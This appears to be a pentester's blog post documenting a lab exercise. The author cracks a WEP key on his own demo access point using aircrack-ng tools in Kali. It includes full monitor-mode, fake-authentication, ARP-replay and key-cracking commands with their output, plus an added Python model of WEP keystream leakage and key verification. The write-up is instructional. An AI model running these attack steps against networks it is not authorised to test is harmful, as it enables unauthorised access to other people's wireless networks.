WEP Cracking with Aircrack-ng in Kali

While I wasn't able to find any WEP networks in my neighborhood, I set up a demo AP at home for some WEP cracking.

For those of you who didn't know, I recently picked up a new Alfa card, so it was time to give it a test drive.

Setup

First, I set up a second SSID on my AP that used WEP, and generated a random 128-bit key.

Once the AP was configured, I ran airodump-ng to find the new network. Note that the --encrypt WEP flag filters the results so that only WEP networks are shown.

root@kali:~/wep# airodump-ng wlan0mon --encrypt WEP

WEP Cracking - AP

Monitoring

After I found the new SSID, I restarted my monitoring interface, this time locked to channel 1. Note the warning in the output below about NetworkManager, wpa_supplicant and dhclient: if injection or capture stalls after a while, 'airmon-ng check kill' stops those processes.

root@kali:~/wep#  airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset
phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n
        (mac80211 station mode vif enabled on [phy0]wlan0)
        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

root@kali:~/wep#  airmon-ng start wlan0 1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  431 NetworkManager
  869 wpa_supplicant
 1747 dhclient

PHY    Interface    Driver        Chipset
phy0    wlan0mon    ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

Once the monitoring interface was back up, it was time to test packet injection with aireplay-ng's injection test (-9).

root@kali:~/wep#  aireplay-ng -9 -e WEPisBAD -a 06:xx:xx:xx:xx:xx wlan0mon
11:34:22  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
11:34:22  Trying broadcast probe requests...
11:34:22  Injection is working!
11:34:24  Found 1 AP

11:34:24  Trying directed probe requests...
11:34:24  06:xx:xx:xx:xx:xx - channel: 1 - 'WEPisBAD'
11:34:25  Ping (min/avg/max): 2.423ms/15.027ms/29.647ms Power: -44.93
11:34:25  30/30: 100%

With packet injection working (30/30 probes answered, 100%), I started airodump-ng again, locked to the AP's channel and BSSID and writing to output-*.cap, to begin capturing IVs.

root@kali:~/wep#  airodump-ng -c 1 --bssid 06:xx:xx:xx:xx:xx -w output wlan0mon

WEP Cracking - Airodump

Authentication

The next step was to perform a fake authentication with the AP. The AP only accepts (and acknowledges) data frames from clients that are associated with it, so the MAC address I inject from (-h, my card's own address) must first authenticate and associate. Because the AP uses Open System authentication, this step does not require the WEP key, and aireplay-ng -1 can do it for me. The 0 after -1 is the re-authentication delay; 0 means a single authentication. If an AP is instead configured for Shared Key authentication, this simple fake authentication fails, and aireplay-ng needs a captured keystream (PRGA) file via -y.

root@kali:~/wep#  aireplay-ng -1 0 -e WEPisBAD -a 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:33:51  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1

11:33:51  Sending Authentication Request (Open System) [ACK]
11:33:51  Authentication successful
11:33:51  Sending Association Request [ACK]
11:33:51  Association successful 🙂 (AID: 1)

Attack

Once the fake authentication was complete, I could start generating traffic. I used aireplay-ng's ARP replay mode (-3). It listens for an ARP request (recognizable by its fixed size even though the frame is encrypted) and re-injects it over and over; the AP accepts it because my MAC is associated, and rebroadcasts it encrypted under a fresh IV each time. Every replayed packet therefore hands airodump-ng a new IV, which is why this mode collects IVs so quickly. It does need at least one real ARP request to replay; as the output below shows, a single one is enough.

root@kali:~/wep#  aireplay-ng --arpreplay -b 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0mon
11:35:44  Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1
Saving ARP requests in replay_arp-0318-113544.cap
You should also start airodump-ng to capture replies.
Read 4036 packets (got 1 ARP requests and 128 ACKs), sent 129 packets...(498 pps)
Read 4147 packets (got 1 ARP requests and 178 ACKs), sent 179 packets...(499 pps)
Read 4255 packets (got 1 ARP requests and 228 ACKs), sent 230 packets...(501 pps)
Read 4362 packets (got 1 ARP requests and 278 ACKs), sent 280 packets...(501 pps)
Read 4471 packets (got 1 ARP requests and 329 ACKs), sent 329 packets...(499 pps)
Read 4574 packets (got 1 ARP requests and 378 ACKs), sent 379 packets...(499 pps)
Read 4679 packets (got 1 ARP requests and 427 ACKs), sent 429 packets...(499 pps)
Read 4790 packets (got 1 ARP requests and 479 ACKs), sent 480 packets...(500 pps)
Read 4895 packets (got 1 ARP requests and 528 ACKs), sent 530 packets...(500 pps)
Read 5003 packets (got 1 ARP requests and 578 ACKs), sent 579 packets...(499 pps)
Read 5111 packets (got 1 ARP requests and 629 ACKs), sent 629 packets...(499 pps)
Read 5217 packets (got 1 ARP requests and 678 ACKs), sent 680 packets...(500 pps)

WEP Cracking - ARP Replay

After a while (around 5,000 data packets), I tried to crack the key. As you can see, this did not work: roughly 6,700 IVs is far too few for a 104-bit ("128-bit") key, for which the PTW attack typically needs on the order of 40,000 or more. The near-tied vote counts in the table below show that no key byte has a clear statistical lead yet. That said, aircrack-ng keeps reading the growing capture and retries the attack every 5,000 new IVs until it succeeds.

root@kali:~/wep#  aircrack-ng output-0*.cap
Opening output-01.cap
Read 138001 packets.

   #  BSSID              ESSID                     Encryption

   1  06:xx:xx:xx:xx:xx  WEPisBAD                  WEP (6710 IVs)

Choosing first network as target.

Opening output-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 6735 ivs.


                                 Aircrack-ng 1.2 rc4


                 [00:00:04] Tested 168121 keys (got 7125 IVs)

   KB    depth   byte(vote)
    0   17/ 18   E4(9728) 13(9472) 29(9472) 2E(9472) 86(9472)  40)
    1   15/ 19   F6(9728) 18(9472) 29(9472) 2F(9472) 50(9472) )
    2    4/  5   D7(10752) 33(10240) 53(10240) AB(10240) D4(10240)
    3   10/  3   9D(9984) 73(9728) 76(9728) 78(9728) 7E(9728) 84)
    4   21/  4   C1(9728) 08(9472) 2C(9472) 4D(9472) 8E(9472) 4)

Failed. Next try with 10000 IVs.

Once I had just over 34,000 IVs, aircrack-ng recovered the 13-byte (104-bit) WEP key!

WEP Cracking - Key Obtained

58:46:7E:7D:5F:7D:2C:6C:3A:46:5D:5A:6E
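To make concrete what the ARP replay above was harvesting, and to check a recovered key offline the way airdecap-ng would, here is a small pure-Python model of WEP framing (RC4 keyed with IV || key, CRC-32 ICV). It is an added example, not code from this post or from aircrack-ng. The ARP request, MAC and IP addresses in it are constructed; the only value taken from the post is the recovered 13-byte key.

```python
"""WEP framing in pure Python (RC4 keyed with IV || key, CRC-32 ICV).

Added example, not code from the original post or from aircrack-ng. It
shows (1) why every replayed ARP request hands the attacker a fresh IV
plus a few bytes of known keystream, and (2) how to check a recovered
key against captured frames. All frames below are constructed here;
nothing comes from the post's capture file.
"""
import os
import struct
import zlib

# The 13-byte (104-bit) key the post recovered. WEP calls this "128-bit"
# because the 24-bit IV is counted alongside it.
RECOVERED_KEY = bytes.fromhex("58467E7D5F7D2C6C3A465D5A6E")

# LLC/SNAP header that precedes an ARP payload in an 802.11 data frame.
# It is identical in every such frame, so the start of each frame's RC4
# keystream is effectively known plaintext.
LLC_SNAP_ARP = bytes.fromhex("AAAA030000000806")


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV(3) | key-id(1) | RC4_{IV||key}(plaintext | ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    data = plaintext + icv
    return iv + b"\x00" + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext if the ICV verifies under `key`, else None."""
    iv, ct = body[:3], body[4:]
    data = xor(ct, rc4(iv + key, len(ct)))
    plaintext, icv = data[:-4], data[-4:]
    if struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF) != icv:
        return None
    return plaintext


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP header + 28-byte Ethernet/IPv4 ARP request (opcode 1)."""
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
    arp += sender_mac + sender_ip + b"\x00" * 6 + target_ip
    return LLC_SNAP_ARP + arp


def replay_arp(key: bytes, arp_plaintext: bytes, count: int) -> list:
    """Model the AP re-encrypting one replayed ARP request `count` times.

    The AP picks a new IV per frame (random here; real APs use random or
    sequential IVs, either way one per frame), so the attacker ends up
    with `count` ciphertexts of the SAME plaintext under `count`
    different IVs. That is exactly what aireplay-ng -3 is for.
    """
    return [wep_encrypt(key, os.urandom(3), arp_plaintext) for _ in range(count)]


def keystream_prefix(body: bytes, known_plaintext: bytes) -> tuple:
    """Recover (IV, first keystream bytes) from a frame whose start is known.

    XORing the ciphertext with the known LLC/SNAP bytes yields the first
    bytes of RC4(IV || key). PTW-style key recovery is built on exactly
    these (IV, keystream prefix) pairs, collected for tens of thousands
    of IVs.
    """
    iv, ct = body[:3], body[4:4 + len(known_plaintext)]
    return iv, xor(ct, known_plaintext)


def verify_key(key: bytes, bodies: list) -> float:
    """Fraction of frames whose ICV verifies under `key` (1.0 == right key)."""
    ok = sum(1 for b in bodies if wep_decrypt(key, b) is not None)
    return ok / len(bodies)


if __name__ == "__main__":
    # Constructed client: MAC 00:AA:BB:CC:DD:EE asking who has 192.168.1.1.
    arp = arp_request(bytes.fromhex("00AABBCCDDEE"), bytes([192, 168, 1, 50]),
                      bytes([192, 168, 1, 1]))
    frames = replay_arp(RECOVERED_KEY, arp, 1000)
    print("distinct IVs from 1000 replays:", len({f[:3] for f in frames}))
    print("encrypted ARP body length:", len(frames[0]), "bytes (fixed size)")
    iv, ks = keystream_prefix(frames[0], LLC_SNAP_ARP)
    print("IV", iv.hex(), "leaks keystream prefix", ks.hex())
    print("right key verifies:", verify_key(RECOVERED_KEY, frames))
    print("wrong key verifies:", verify_key(bytes(13), frames))
```

Run it and you see the two facts the attack relies on: a thousand replays of one ARP request yield (almost) a thousand distinct IVs, each leaking keystream bytes through the fixed LLC/SNAP header, and the recovered key decrypts every frame with a valid ICV while a wrong key decrypts none. The same ICV check is what airdecap-ng -w <hex key> performs on a real capture.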

Connecting

To verify the key was correct, I attempted to connect using the networking UI. (An offline check is also possible: airdecap-ng -w <hex key> output-01.cap decrypts the capture and reports how many WEP packets were decrypted.)

WEP Cracking - Connecting

After a few seconds I was connected, and iwconfig showed the association with the WEP network!

WEP Cracking - Connected

Conclusion

While WEP cracking is a little less relevant nowadays, it was still a fun exercise to try out my new toy. For more information about this attack, and many more, I recommend the aircrack-ng wiki.

doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Filed under Security Not Included
